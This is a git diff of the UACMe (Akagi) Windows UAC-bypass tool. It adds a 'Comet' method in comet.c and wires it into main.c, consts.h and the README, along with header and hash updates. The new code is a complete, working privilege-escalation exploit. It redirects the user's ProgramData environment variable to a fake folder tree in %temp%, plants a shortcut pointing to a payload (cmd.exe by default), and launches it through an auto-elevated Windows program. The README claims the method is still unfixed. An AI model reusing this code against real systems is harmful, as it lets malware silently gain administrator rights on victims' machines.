diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe index d5d9b3d..6592105 100644 Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe index 00b33e5..3a10123 100644 Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ diff --git a/README.md b/README.md index 20e7beb..844a78c 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,8 @@ Keys (watch debug ouput with dbgview or similar for more info): * 20 - Hybrid method, abusing Microsoft Management Console and incorrect dll loading scheme, works from Windows 7 up to 10rs2 14997; * 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs2 14997; * 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 14997; -* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997. +* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997; +* 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15007. Note: * Several methods require process injection, so they won't work from wow64, use x64 edition of this tool; @@ -85,7 +86,7 @@ Methods fixed: * 22 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work); * 23 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work). -Currently, 16 January 2017 Windows 10 RS2 starting from 1500X builds is the most protected Microsoft OS ever made. +** 24 is not fixed as at 17 January 2017. If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) @@ -105,8 +106,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 # VirusTotal reference report -* Akagi32 https://www.virustotal.com/en/file/4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b/analysis/ -* Akagi64 https://www.virustotal.com/en/file/9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5/analysis/ +* Akagi32 https://www.virustotal.com/en/file/f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc/analysis/ +* Akagi64 https://www.virustotal.com/en/file/2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17/analysis/ # Build @@ -120,6 +121,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 * Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/ * Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog * KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643 +* Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited # Authors diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index 1e36bb9..1fed8a8 100644 Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ diff --git a/Source/Akagi/comet.c b/Source/Akagi/comet.c new file mode 100644 index 0000000..3b7eb76 --- /dev/null +++ b/Source/Akagi/comet.c @@ -0,0 +1,188 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 - 2017 +* +* TITLE: COMET.C +* +* VERSION: 2.52 +* +* DATE: 17 Jan 2017 +* +* Comet method (c) BreakingMalware +* For description please visit original URL +* https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" +#include +#include + +/* +* ucmSetEnvVariable +* +* Purpose: +* +* Remove of set current user environment variable. +* +*/ +BOOL ucmSetEnvVariable( + _In_ BOOL fRemove, + _In_ LPWSTR lpVariableName, + _In_opt_ LPWSTR lpVariableData + ) +{ + BOOL bResult = FALSE, bCond = FALSE; + HKEY hKey = NULL; + + do { + if (lpVariableName == NULL) + break; + + if ((lpVariableData == NULL) && (fRemove != TRUE)) + break; + + if (RegOpenKey(HKEY_CURRENT_USER, L"Environment", &hKey) != ERROR_SUCCESS) + break; + + if (fRemove) { + RegDeleteValue(hKey, lpVariableName); + } + else { + if (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData, + (DWORD)(_strlen(lpVariableData) * sizeof(WCHAR))) != ERROR_SUCCESS) + { + break; + } + } + bResult = TRUE; + + } while (bCond); + + return bResult; +} + +/* +* ucmCometMethod +* +* Purpose: +* +* Fool autoelevated application with help of manipulation of the current user environment variables. +* CompMgmtLauncher.exe is a moronic .LNK ShellExecute launcher application. +* Only MS do system trusted applications which only purpose is to LAUNCH .LNK files. +* +*/ +BOOL ucmCometMethod( + LPWSTR lpszPayload + ) +{ +#ifndef _WIN64 + PVOID OldValue = NULL; +#endif + + BOOL bCond = FALSE, bResult = FALSE; + WCHAR szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3]; + HRESULT hResult; + + IPersistFile *persistFile = NULL; + IShellLink *newLink = NULL; + +#ifndef _WIN64 + if (g_ctx.IsWow64) { + if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue))) + return FALSE; + } +#endif + + do { + + RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath)); + _strcpy(szCombinedPath, g_ctx.szTempDirectory); + _strcat(szCombinedPath, L"huy32"); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + _strcpy(szLinkFile, szCombinedPath); + _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); + if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D} + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + if (!ucmSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath)) + break; + + _strcat(szCombinedPath, TEXT("\\Microsoft")); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + _strcat(szCombinedPath, TEXT("\\Windows")); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + _strcat(szCombinedPath, TEXT("\\Start Menu")); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + _strcat(szCombinedPath, TEXT("\\Programs")); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + _strcat(szCombinedPath, TEXT("\\Administrative Tools")); + if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools + if (GetLastError() != ERROR_ALREADY_EXISTS) + break; + } + + hResult = CoInitialize(NULL); + if (SUCCEEDED(hResult)) { + hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink); + if (SUCCEEDED(hResult)) { + newLink->lpVtbl->SetPath(newLink, lpszPayload); + newLink->lpVtbl->SetArguments(newLink, L""); + newLink->lpVtbl->SetDescription(newLink, L"Comet method"); + hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile); + if (SUCCEEDED(hResult)) { + _strcpy(szLinkFile, szCombinedPath); + _strcat(szLinkFile, L"\\Computer Management.lnk"); + if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) { + persistFile->lpVtbl->Release(persistFile); + + _strcpy(szCombinedPath, g_ctx.szTempDirectory); + _strcat(szCombinedPath, L"huy32"); + _strcpy(szLinkFile, szCombinedPath); + _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); + + ShellExecute(NULL, L"Manage", szLinkFile, L"", szCombinedPath, SW_SHOW); + bResult = TRUE; + } + } + newLink->lpVtbl->Release(newLink); + } + } + + } while (bCond); + +#ifndef _WIN64 + if (g_ctx.IsWow64) { + RtlWow64EnableFsRedirectionEx(OldValue, &OldValue); + } +#endif + + ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL); + return bResult; +} diff --git a/Source/Akagi/comet.h b/Source/Akagi/comet.h new file mode 100644 index 0000000..1bd3967 --- /dev/null +++ b/Source/Akagi/comet.h @@ -0,0 +1,23 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 - 2017 +* +* TITLE: COMET.H +* +* VERSION: 2.52 +* +* DATE: 17 Jan 2017 +* +* Prototypes and definitions for Comet method. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#pragma once + +BOOL ucmCometMethod( + LPWSTR lpszPayload + ); diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h index 2c28916..f86ab9e 100644 --- a/Source/Akagi/consts.h +++ b/Source/Akagi/consts.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2016 +* (C) COPYRIGHT AUTHORS, 2015 - 2017 * * TITLE: CONSTS.H * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Global consts definition file. * @@ -31,7 +31,9 @@ #define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}" #define ISECURITYEDITOR_ELEMONIKER L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}" #define IFILEOP_ELEMONIKER L"Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" +#define T_CLSID_MYCOMPUTER_COMET L"\\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" #define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)" +#define T_PROGRAMDATA L"ProgramData" #define MANIFEST_EXT L".manifest" #define ELLOCNAK_MSU L"ellocnak.msu" @@ -56,7 +58,6 @@ #define DEVOBJ_DLL L"devobj.dll" #define UNBCL_DLL L"unbcl.dll" #define DISMCORE_DLL L"dismcore.dll" -#define WOW64LOG_DLL L"wow64log.dll" #define CLICONFG_EXE L"cliconfg.exe" #define OOBE_EXE L"oobe.exe" #define WINSAT_EXE L"winsat.exe" @@ -82,6 +83,8 @@ #define RSOP_MSC L"rsop.msc" #define PACKAGE_XML L"ellocnak.xml" +#define T_DEFAULT_CMD L"%systemroot%\\system32\\cmd.exe" + #define LOCAL_SXS L".local" #define FAKE_LOCAL_SXS L".hawawa" #define INETMGR_SXS L"microsoft-windows-iis-managementconsole" diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index 1b28602..ebd2a54 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016 +* (C) COPYRIGHT AUTHORS, 2014 - 2017 * * TITLE: GLOBAL.H * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 10 July 2016 +* DATE: 17 Jan 2017 * * Common header file for the program support routines. * @@ -77,7 +77,7 @@ typedef enum _UACBYPASSMETHOD { UacMethodSXS, UacMethodSXSConsent, UacMethodDISM, - //UacMethod24, + UacMethodComet, UacMethodMax } UACBYPASSMETHOD; @@ -97,6 +97,7 @@ typedef enum _UACBYPASSMETHOD { #include "simda.h" #include "carberp.h" #include "hybrids.h" +#include "comet.h" //default execution flow #define AKAGI_FLAG_KILO 0 diff --git a/Source/Akagi/gootkit.c b/Source/Akagi/gootkit.c index b92bbee..577aab2 100644 --- a/Source/Akagi/gootkit.c +++ b/Source/Akagi/gootkit.c @@ -1,13 +1,13 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016, +* (C) COPYRIGHT AUTHORS, 2014 - 2017, * (C) MS FixIT Shim Patches revealed by Jon Erickson * * TITLE: GOOTKIT.C * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Gootkit based AutoElevation using AppCompat. * @@ -487,7 +487,7 @@ BOOL ucmAppcompatElevation( if (Method == UacMethodRedirectExe) { if (lpszPayloadEXE == NULL) { - _strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe"); + _strcpy_w(szBuffer, T_DEFAULT_CMD); bResult = ucmShimRedirectEXE(szBuffer); } else { diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index c99cf8f..966c2bf 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016 +* (C) COPYRIGHT AUTHORS, 2014 - 2017 * * TITLE: MAIN.C * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Program entry point. * @@ -485,6 +485,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -493,6 +498,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -501,6 +511,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -509,9 +524,16 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; + case UacMethodComet: + break; } //prepare command for payload @@ -519,7 +541,7 @@ UINT ucmMain() RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, ¶mLen); if (paramLen > 0) { - if (g_ctx.Method != UacMethodRedirectExe) { + if ((g_ctx.Method != UacMethodRedirectExe) && (g_ctx.Method != UacMethodComet)) { supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR)); } } @@ -743,6 +765,11 @@ UINT ucmMain() break; #endif + case UacMethodComet: + if (ucmCometMethod((paramLen != 0) ? szBuffer : T_DEFAULT_CMD)) { + return ERROR_SUCCESS; + } + break; } diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index 9d5493b..149a641 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -240,6 +240,7 @@ + @@ -255,6 +256,7 @@ + diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters index 1c48a4c..9cd8b20 100644 --- a/Source/Akagi/uacme.vcxproj.filters +++ b/Source/Akagi/uacme.vcxproj.filters @@ -87,6 +87,9 @@ minirtl + + Source Files + @@ -137,6 +140,9 @@ Header Files + + Header Files + diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index dcfc012..91181ba 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -9,11 +9,11 @@ WindowsLocalDebugger - 23 + 24 WindowsLocalDebugger - 23 + 24 WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h index d3dbaac..464e083 100644 --- a/Source/Shared/ntos.h +++ b/Source/Shared/ntos.h @@ -1,12 +1,12 @@ /************************************************************************************ * -* (C) COPYRIGHT AUTHORS, 2015 - 2016, translated from Microsoft sources/debugger +* (C) COPYRIGHT AUTHORS, 2015 - 2017, translated from Microsoft sources/debugger * * TITLE: NTOS.H * -* VERSION: 1.47 +* VERSION: 1.51 * -* DATE: 10 July 2016 +* DATE: 18 Jan 2017 * * Common header file for the ntos API functions and definitions. * @@ -109,6 +109,18 @@ #define TRACELOG_ACCESS_REALTIME 0x0400 #define TRACELOG_REGISTER_GUIDS 0x0800 +// +// Partition Specific Access Rights. +// + +#define MEMORY_PARTITION_QUERY_ACCESS 0x0001 +#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002 + +#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \ + SYNCHRONIZE | \ + MEMORY_PARTITION_QUERY_ACCESS | \ + MEMORY_PARTITION_MODIFY_ACCESS) + #define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) #define ZwCurrentProcess() NtCurrentProcess() @@ -128,6 +140,15 @@ #define MAXUSHORT 0xffff #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) +typedef struct _EX_RUNDOWN_REF +{ + union + { + ULONG Count; + PVOID Ptr; + }; +} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF; + typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; @@ -204,6 +225,19 @@ typedef struct _SEMAPHORE_BASIC_INFORMATION { ** Semaphore END */ +/* +** Kernel Debugger START +*/ + +typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { + BOOLEAN KernelDebuggerEnabled; + BOOLEAN KernelDebuggerNotPresent; +} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; + +/* +** Kernel Debugger END +*/ + /* ** FileCache and MemoryList START */ @@ -4171,8 +4205,9 @@ typedef struct _KUSER_SHARED_DATA_COMPAT { ULONG DbgDynProcessorEnabled : 1; ULONG DbgConsoleBrokerEnabled : 1; ULONG DbgSecureBootEnabled : 1; - ULONG DbgMultiSessionSku : 1; - ULONG SpareBits : 23; + ULONG DbgMultiSessionSku : 1; + ULONG DbgMultiUsersInSessionSku : 1; + ULONG SpareBits : 22; }; }; @@ -4186,6 +4221,44 @@ typedef struct _KUSER_SHARED_DATA_COMPAT { ** KUSER_SHARED_DATA END */ +/* +** FLT MANAGER START +*/ + +#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1 +#define FLTFL_FILTERING_INITIATED 0x2 +#define FLTFL_NAME_PROVIDER 0x4 +#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8 + +#define FLT_OBFL_DRAINING 0x1 +#define FLT_OBFL_ZOMBIED 0x2 +#define FLT_OBFL_TYPE_INSTANCE 0x1000000 +#define FLT_OBFL_TYPE_FILTER 0x2000000 +#define FLT_OBFL_TYPE_VOLUME 0x4000000 + +typedef struct _FLT_OBJECT { + ULONG Flags; + ULONG PointerCount; + EX_RUNDOWN_REF RundownRef; + LIST_ENTRY PrimaryLink; +} FLT_OBJECT, *PFLT_OBJECT; + +typedef struct _FLT_SERVER_PORT_OBJECT { + LIST_ENTRY FilterLink; + PVOID ConnectNotify; + PVOID DisconnectNotify; + PVOID MessageNotify; + PVOID Filter; + PVOID Cookie; + ULONG Flags; + ULONG NumberOfConnections; + ULONG MaxConnections; +} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; + +/* +** FLT MANAGER END +*/ + /* ** RTL START */ @@ -4574,6 +4647,16 @@ VOID NTAPI RtlSetLastWin32Error( LONG Win32Error ); + +NTSTATUS NTAPI RtlWow64EnableFsRedirection( + _In_ BOOLEAN Wow64FsEnableRedirection + ); + +NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx( + _In_ PVOID DisableFsRedirection, + _Out_ PVOID *OldFsRedirectionLevel + ); + typedef NTSTATUS (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( IN PVOID Base, @@ -5775,6 +5858,14 @@ NTSTATUS NTAPI NtQuerySecurityObject( _Out_ PULONG LengthNeeded ); +NTSTATUS NTAPI NtQueryLicenseValue( + _In_ PUNICODE_STRING ValueName, + _Out_opt_ PULONG Type, + _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data, + _In_ ULONG DataSize, + _Out_ PULONG ResultDataSize +); + NTSTATUS NtCreateIoCompletion( _Out_ PHANDLE IoCompletionHandle, _In_ ACCESS_MASK DesiredAccess, diff --git a/UACME.sha256 b/UACME.sha256 index 1c58dab..5cec265 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -1,5 +1,5 @@ -4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b *Compiled\Akagi32.exe -9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5 *Compiled\Akagi64.exe +f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc *Compiled\Akagi32.exe +2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17 *Compiled\Akagi64.exe 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest @@ -10,29 +10,31 @@ a482ae2d4e1d0a8a1fe69e70c616800cc4cdab41d77bcbf3f391911eb8f3f44d *Source\Akagi\b e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\bin64res.rc 31561a29aeef347b9eb2d763dd13ec5efbf524309ae3e73009e916d5a298213e *Source\Akagi\carberp.c 35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h +1edbced7c0e0a4623e94cc0cf5eb0b0a892055efdbe120ec99740e7095669ca0 *Source\Akagi\comet.c +ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h -da4ec050a3d7b306021e1f66af6e5eadc6222904c433f83a5e8aea2d5fc5ff15 *Source\Akagi\consts.h -b63833dd4dd9ac82abf04caa3f6d835bc15de6997377eda9763727a0a9de27c9 *Source\Akagi\global.h -027a4bf1e01d7283f72c97bacdf08b845030cc2a2631eb882793bdd22518a632 *Source\Akagi\gootkit.c +117b7a1fc984f75cafc6a9613703ef920018f1188ac241aa609dc70f71c0d208 *Source\Akagi\consts.h +3f7d65507e3c26e9bc01b67b6f305a15337d3f34114a41d1c0c387fc857f8c08 *Source\Akagi\global.h +5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h 46ca3d450773a8b39fc5caccdeabbad1bf7cef0a1694bd94284ca75c02085b38 *Source\Akagi\hybrids.c 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h -24e72497fbdbfc3aded5843eee818bf6ab5009edbc29606f26a5959cdcaf4bfe *Source\Akagi\main.c +4d07f686c54d03cb592a03ac22b03e6012c218e8b771d45afe667fbcad92cf43 *Source\Akagi\main.c dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h 7e3ce9159f8d80775c476bfe1e3eaed960cd0053c569ec44791936ae2546301b *Source\Akagi\pitou.c 7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -652a70321893ccf4ea8df0ed4a72bef230c227b3b2638174cba01717c06454b5 *Source\Akagi\Resource.rc +dc8f2a3c2bfffb5b88cbfc8ca0d99e38a44d1343ee15013858b99022c6ff2d75 *Source\Akagi\Resource.rc d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c 9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h 7e2bee1be67d96edca66ea19aac60896b97449af72da653206102930ae676aca *Source\Akagi\sup.c ee7b5b03ff6401b82fae2eb453603cbb7a39d81d1bca1d0cb835e92baaaf4c2d *Source\Akagi\sup.h -520b30af34233a3c17e546d1bb3a745fe8e9819067a795ec709018da3ba8b7b2 *Source\Akagi\uacme.vcxproj -aa3c16d7e1d651a84b04c652c689b4fb1e7b81c1e390860ed0360df51483ee22 *Source\Akagi\uacme.vcxproj.filters -5ac1b51187339ca0ead48704f9ceb57ae5561eba4eee1267b8a7461dc7e4c130 *Source\Akagi\uacme.vcxproj.user +472953271f598efcd79e4a741df77188c60bfb3b2867cb7465fa068e387362a9 *Source\Akagi\uacme.vcxproj +c6986aecdf474a9ac568fd122956a016c2583156448627c1c9f60d7b08d5f306 *Source\Akagi\uacme.vcxproj.filters +69ef84d851e52fa90e78232720740a13addb67a3a72936bf159559db05085cbe *Source\Akagi\uacme.vcxproj.user a848ec296f79f6eca82202e1ebf95d69da8ab16cfa336418ce9a9e36fe81ae0c *Source\Akagi\bin\Fubuki32.cd 0cb9aff9b689c6ffb1b0f307caec4a3b67dbd459a610dcca72cd9be70a4b6094 *Source\Akagi\bin\Fubuki64.cd 0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd @@ -75,7 +77,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h -eeb7e2580b8f304693d200b48a0664600d86a9b8323a36fd65e8ed394d563964 *Source\Shared\ntos.h +0eee79ee4fa4692222fc647159ac532dc2019f568160ca4c9fed9de9cc39b593 *Source\Shared\ntos.h b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c